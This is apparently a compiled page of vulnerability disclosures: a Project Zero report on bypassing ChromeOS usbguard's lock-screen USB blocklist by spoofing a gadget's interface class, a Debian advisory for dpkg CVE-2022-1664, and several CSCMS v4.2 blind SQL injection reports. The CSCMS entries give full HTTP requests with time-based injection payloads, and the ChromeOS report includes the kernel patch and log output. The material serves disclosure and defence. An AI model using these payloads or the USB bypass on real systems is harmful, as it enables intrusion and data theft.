ChromeOS uses usbguard when the screen is locked but appears to suffer from bypass issues.

    ChromeOS' usage of usbguard is bypassableVULNERABILITY DETAILSChromeOS uses https://usbguard.github.io/ when the screen is locked (but noton the login screen, perhaps because it is expected that code execution is muchless helpful when the disk is still encrypted?).When the screen is locked, a policy is applied that might look like this(example from my Pixelbook):```allow id 0bda:564b serial \"\\x07LOE65001063010A78M015CFAI06BF12000\" name \"WebCamera\" hash \"KsByWtMB5JtGNDimauArXMiZOThFwagdTWeQsMAZ48c=\" with-interface { 0e:01:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 } with-connect-type \"hardwired\"allow id 1d6b:0002 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"jEP/6WzviqdJ5VSeTUY8PatCNBKeaREvo2OqdplND/o=\" with-interface 09:00:00 with-connect-type \"\"allow id 1d6b:0003 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"3Wo3XWDgen1hD5xM3PSNl3P98kLp1RUTgGQ5HSxtf8k=\" with-interface 09:00:00 with-connect-type \"\"allow id 8087:0a2a serial \"\" name \"\" hash \"AyPZWy2XK0931kB9A/owYfk5xHEqnpDsJfdeLSGIyuk=\" with-interface { e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 } with-connect-type \"hardwired\"##################################################################################################### Footer.####################################################################################################block with-interface one-of { 05:*:* 06:*:* 07:*:* 08:*:* } # physical, image, printer, storageallow```As you can see, it mostly just allowlists specific devices with full hashes ofthe expected USB configuration descriptors, and internal USB devices are markedsuch that they won't be accepted on external USB ports.(Which, by the way, might not actually be necessary, since the USB subsystem's`authorized_default` flag is set to 2 when the screen is locked, not 0, meaninginternal USB devices are automatically allowed anyway?)But then at the bottom is this footer that blocks USB devices with interfacedescriptors that contain the following `bInterfaceClass` values: - USB_CLASS_PHYSICAL (5) - USB_CLASS_STILL_IMAGE (6) - USB_CLASS_PRINTER (7) - USB_CLASS_MASS_STORAGE (8)Afterwards, anything else is permitted.This configuration footer comes from<https://source.chromium.org/chromiumos/chromiumos/codesearch/+/main:src/third_party/chromiumos-overlay/sys-apps/usbguard/files/99-rules.conf>.The interface-based classification of devices was introduced in<https://chromium-review.googlesource.com/c/chromiumos/overlays/chromiumos-overlay/+/1217622/>.Apart from the problem that there is a large amount of attack surface in driversfor devices that don't belong into those USB interface classes, there is anotherissue with this approach:The kernel often doesn't care what USB class a device claims to be. The way USBdrivers tend to work, even for standardized protocols, is that the driverspecifies with low priority that it would like to bind to standards-compliantdevices using the proper USB interface class, but also specifies with highpriority that it would like to bind to specific USB devices based on Vendor IDand Product ID, without caring about their USB interface class.As an example, USB_CLASS_MASS_STORAGE is blocklisted, so a USB stick insertedwhile the screen is locked doesn't get past the authorization check:[ 6411.611320] usb 1-1: new high-speed USB device number 31 using xhci_hcd[ 6411.738900] usb 1-1: New USB device found, idVendor=0781, idProduct=5580, bcdDevice= 0.10[ 6411.738910] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3[ 6411.738916] usb 1-1: Product: [...][ 6411.738921] usb 1-1: Manufacturer: SanDisk[ 6411.738926] usb 1-1: SerialNumber: [...][ 6411.740583] usb 1-1: Device is not authorized for usage[ 6414.875133] cros-ec-sensorhub [...][ 6418.603609] usb 1-1: USB disconnect, device number 31But if we use a Linux machine with appropriate hardware (I'm using a NET2380 devboard, but you could probably also do it with an unlocked Pixel phone or aRaspberry Pi Zero W or something like that) to emulate a USB Mass Storagedevice, using <https://docs.kernel.org/usb/mass-storage.html>, and patch oneline in the attacker kernel so that it claims to be a billboard, not a storagedevice:diff --git a/drivers/usb/gadget/function/storage_common.c b/drivers/usb/gadget/function/storage_common.cindex b859a158a414..d7452c8458a9 100644--- a/drivers/usb/gadget/function/storage_common.c+++ b/drivers/usb/gadget/function/storage_common.c@@ -34,7 +34,7 @@ struct usb_interface_descriptor fsg_intf_desc = {   .bDescriptorType =  USB_DT_INTERFACE,    .bNumEndpoints =  2,    /* Adjusted during fsg_bind() */-  .bInterfaceClass =  USB_CLASS_MASS_STORAGE,+  .bInterfaceClass =  USB_CLASS_BILLBOARD,   .bInterfaceSubClass =  USB_SC_SCSI,  /* Adjusted during fsg_bind() */   .bInterfaceProtocol =  USB_PR_BULK,  /* Adjusted during fsg_bind() */   .iInterface =    FSG_STRING_INTERFACE,Then we can connect just fine even while the screen is locked - first we get a\"Device is not authorized\" message on the initial connection, then usbguardunblocks us and the kernel probes the device as a mass storage device and scansthe partition table:[ 6432.752906] usb 1-1: new high-speed USB device number 32 using xhci_hcd[ 6432.885635] usb 1-1: New USB device found, idVendor=0525, idProduct=a4a5, bcdDevice= 5.17[ 6432.885647] usb 1-1: New USB device strings: Mfr=3, Product=4, SerialNumber=0[ 6432.885653] usb 1-1: Product: Mass Storage Gadget[ 6432.885658] usb 1-1: Manufacturer: Linux 5.17.0-rc4+ with net2280[ 6432.886121] usb 1-1: Device is not authorized for usage[ 6432.891672] usb-storage 1-1:1.0: USB Mass Storage device detected[ 6432.891985] usb-storage 1-1:1.0: Quirks match for vid 0525 pid a4a5: 10000[ 6432.892090] scsi host0: usb-storage 1-1:1.0[ 6432.892567] usb 1-1: authorized to connect[ 6433.920354] scsi 0:0:0:0: Direct-Access     Linux    File-Stor Gadget 0517 PQ: 0 ANSI: 2[ 6433.922585] sd 0:0:0:0: Power-on or device reset occurred[ 6433.923533] sd 0:0:0:0: [sda] 204800 512-byte logical blocks: (105 MB/100 MiB)[ 6434.030869] sd 0:0:0:0: [sda] Write Protect is off[ 6434.030876] sd 0:0:0:0: [sda] Mode Sense: 0f 00 00 00[ 6434.136540] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA[ 6434.363462]  sda: sda1 sda2[ 6434.585367] cros-ec-sensorhub [...][ 6434.588541] sd 0:0:0:0: [sda] Attached SCSI diskI haven't looked at how this issue applies to other USB subsystems in detail,but from a quick glance: - USB_CLASS_PHYSICAL doesn't really show up in the Linux kernel outside of some   number-to-string translation table, so I don't think it matters to the kernel. - Same thing with USB_CLASS_STILL_IMAGE. - The usblp subsystem does have an explicit check for USB_CLASS_PRINTER - but   that check is intentionally bypassed for known devices that are marked in   the kernel as USBLP_QUIRK_BAD_CLASS, and that flag is set for the   \"Seiko Epson Receipt Printer M129C\" (vendor 0x04b8, device 0x0202), so you   can probably also bypass the blocking of the printer interface class that way.I think the best way forward would be to look into whether it is feasible torely exclusively on a trust-on-first-use approach. If that is infeasible, youmay have to talk to upstream about how userspace can reliably determine whichdriver(s) a given USB device might be bound to, since I'm not aware of anyinterface that would let you do that.VERSIONGoogle Chrome  98.0.4758.107 (Official Build) (64-bit) Revision  a2ef32d533baed737df9fc2ed8d505405ecf0c66-refs/branch-heads/4758@{#1167}Platform  14388.61.0 (Official Build) stable-channel eveFirmware Version  Google_Eve.9584.230.0Customization ID  GOOGLE-EVEARC  8165997CREDIT INFORMATIONReporter credit: Jann Horn of Google Project ZeroThis bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2022-05-25.Found by: jannh@google.com

ChromeOS usbguard Bypass

Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.

\[Date Prev\]\[Date Next\] \[Thread Prev\]\[Thread Next\] \[Date Index\] \[Thread Index\]

*   _To_: debian-security-announce@lists.debian.org
*   _Subject_: \[SECURITY\] \[DSA 5147-1\] dpkg security update
*   _From_: Salvatore Bonaccorso <carnil@debian.org\>
*   _Date_: Wed, 25 May 2022 15:31:54 +0000
*   _Message-id_: <\[🔎\] E1ntszK-0003ng-Lk@seger.debian.org\>
*   _Reply-to_: debian-security-announce-request@lists.debian.org

\-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-5147-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
May 25, 2022                          https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : dpkg
CVE ID         : CVE-2022-1664

Max Justicz reported a directory traversal vulnerability in
Dpkg::Source::Archive in dpkg, the Debian package management system.
This affects extracting untrusted source packages in the v2 and v3
source package formats that include a debian.tar.

For the oldstable distribution (buster), this problem has been fixed
in version 1.19.8.

For the stable distribution (bullseye), this problem has been fixed in
version 1.20.10.

We recommend that you upgrade your dpkg packages.

For the detailed security status of dpkg please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/dpkg

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmKOS75fFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND
z0SQiw//emxzoeBb84SW7etFMi/UQJZSPSg9sEcbD3IKAUU4DbZsz1rnPiydijHw
X7eYWx3SoCx4wItsLT5n9eMFCGoyMp0zPebv8T7ipr/0dhe+R5MNKkKqmvBZOO10
MP9o3rm2VA0wUSHeNNhFlQHf/4cFWYXSeQGdq5/iemZcYY+/nEt56EX9iEoQX5dq
AQ3eQ90nczZrOY3JSVtiJmv7btq19EcVDF54iqzKVdKis34305J77i+ZMVyYhMId
cuWsv6ZgvdjfqLb8hYVE4IlXJZHATx5NKzAx1g5ZkeC/rbZCTLoEoBi+VV7caRxB
7ailjM5E5Qcd8f/nIQDq9ZkPKF8kKc5FlFW+K7FKO2YbVhcwqAodFosphRMc9G7j
p98aTDjp7WC9if5QwgdiSdt3h2/hFRfRZd6otlk8ub8i/OT5pbvCBrCWPS8Q8Hr5
pLQ0SgUnyANBPhJiByg4Km+Rl/nzI0VbZqxb19zQeMJK+SJoEgYrhhzoR32ZCLs0
cqf5xnlaiXWwi2I7mTJP7RwWTnESXFBMW0IjhDW2UDqK26jSgjWjFPBb+4JKRk+M
vkhVbxCoZo5wh5LoOQAD5u34ggsZliid6cs7nNWXg3Wvw1kxh+WTnReVnlD4tcV7
jWlMgVOgCucWXGYXauB1b2nUTAXq5f/gjaCOF/yTi0jVuqgW9tI=
=zSO4
-----END PGP SIGNATURE-----

**Reply to:**

*   debian-security-announce@lists.debian.org
*   Salvatore Bonaccorso (on-list)
*   Salvatore Bonaccorso (off-list)

*   Prev by Date: **\[SECURITY\] \[DSA 5146-1\] puma security update**
*   Next by Date: **\[SECURITY\] \[DSA 5148-1\] chromium security update**
*   Previous by thread: **\[SECURITY\] \[DSA 5146-1\] puma security update**
*   Next by thread: **\[SECURITY\] \[DSA 5148-1\] chromium security update**
*   Index(es):
    *   **Date**
    *   **Thread**

CVE-2022-1664: [SECURITY] [DSA 5147-1] dpkg security update

CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/Label/page_del.

**Details**

there is a Injection vulnerability exists in sys\_Label.php\_page\_del

    POST /admin.php/Label/page_del HTTP/1.1
    Host: cscms.test
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://cscms.test/admin.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_session=3lvkrqraebntvbg76ecdifg0j6vl1bpl; cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA;XDEBUG_SESSION=PHPSTORM
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 20
    
    id[]='or+(sleep(5))#
    

You can see that success makes the server sleep  
Construct payload to guess the database

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)

There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C', substr ((select + database()), 1,1) = 'C' is true, and the verification is correct

CVE-2022-29683: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #34 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the id parameter at /admin.php/news/admin/lists/zhuan.

**Details**

Injection vulnerability exists in news\_Lists.php\_zhuan

construct payload

    POST /admin.php/news/admin/lists/zhuan HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/news/admin/topic?v=705
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=b3vaeo61gbiune90rtjsdcqg2am7gqgl;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    id[]=(sleep(5))&cid=5
    

The injection point is ID and sleeps for 5 seconds

construct payload

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit

CVE-2022-29669: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #20 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/singer/admin/singer/hy.

**Details**

There is a Injection vulnerability exists in singer\_Singer.php\_hy

After logging in, the administrator needs to add a singer and then delete the singer. When the singer is recycled from the recycle bin, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as follows

    GET /admin.php/singer/admin/singer/hy?id=4)and(sleep(5))--+ HTTP/1.1
    Host: cscms.test
    Accept: application/json, text/javascript, */*; q=0.01
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://cscms.test/admin.php/singer/admin/singer?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=8adckmrcsj3354hqhqqe0pb8hhu14j85
    Connection: close
    

Discovery success makes the server sleep  
Construct payload database

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit

CVE-2022-29688: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #27 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/singer/admin/lists/zhuan.

**Details**

there is a Injection vulnerability exists in singer\_Lists.php\_zhuan

After logging in, the administrator needs to add a singer first. SQL injection vulnerability is generated when adding singers. The constructed malicious payload is as follows

    POST /admin.php/singer/admin/lists/zhuan HTTP/1.1
    Host: cscms.test
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://cscms.test/admin.php/singer/admin/singer/edit?id=1&yid=0
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=g42fjt0uioqebo85qteg4bs56kjckdio
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 21
    
    id[]=(sleep(5))&cid=5
    

You can see that success makes the server sleep  
Construct payload to guess the database

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)   

There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C', substr ((select + database()), 1,1) = 'C' is true, and the verification is correct

CVE-2022-29686: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #29 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/Links/del.

**Details**

there is a Injection vulnerability exists in sys\_Links.php\_del

After logging in, the administrator needs to add a friendship link first. SQL injection vulnerability occurs when deleting the friendship link. The constructed malicious payload is as follows

    POST /admin.php/Links/del HTTP/1.1
    Host: cscms.test
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://cscms.test/admin.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_session=3lvkrqraebntvbg76ecdifg0j6vl1bpl; cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA;XDEBUG_SESSION=PHPSTORM
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15
    
    id[]=(sleep(5))
    

You can see that success makes the server sleep  
Construct payload to guess the database

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)

There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C', substr ((select + database()), 1,1) = 'C' is true, and the verification is correct

CVE-2022-29681: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #35 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/user/level_del.

The administrator needs to add a member after logging in. SQL injection vulnerability is generated when deleting the member. The constructed malicious payload is as follows

    POST /admin.php/user/level_del HTTP/1.1
    Host: cscms.test
    Content-Length: 15
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/user/level?v=2012
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=6g124miit249dnkv508bnrsshc8ugiss;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    id[]=(sleep(5))
    

You can see that success makes the server sleep  
Construct payload to guess the database

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)

There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C', substr ((select + database()), 1,1) = 'C' is true, and the verification is correct

CVE-2022-29687: SQL injection vulnerability exists in Cscms music portal system v4.2 （Discovered by 星海Lab） · Issue #30 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/user/zu_del.

The administrator needs to add a user to the member list after logging in. SQL injection vulnerability is generated when deleting the user. The constructed malicious payload is as follows

    POST /admin.php/user/zu_del HTTP/1.1
    Host: cscms.test
    Content-Length: 15
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/user/level?v=2012
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=6g124miit249dnkv508bnrsshc8ugiss;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    id[]=(sleep(5))
    

You can see that success makes the server sleep  
Construct payload to guess the database

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)

There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C', substr ((select + database()), 1,1) = 'C' is true, and the verification is correct

CVE-2022-29680: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #31 · chshcms/cscms

CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/singer/admin/singer/del.

**Details**

there is a Injection vulnerability exists in singer\_Singer.php\_del

After logging in, the administrator needs to add a singer first and then delete the singer. When deleting the singer, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as follows

    POST /admin.php/singer/admin/singer/del?yid=3 HTTP/1.1
    Host: cscms.test
    Content-Length: 4
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/singer/admin/singer?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=v1ahrkd5h84dsm4ftla4ruuks41kb526
    Connection: close
    
    id=1)and(sleep(5))--+
    

You can see that success makes the server sleep  
Construct payload database

There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C', substr ((select + database()), 1,1) = 'C' is true, and the verification is correct

Tag

#chrome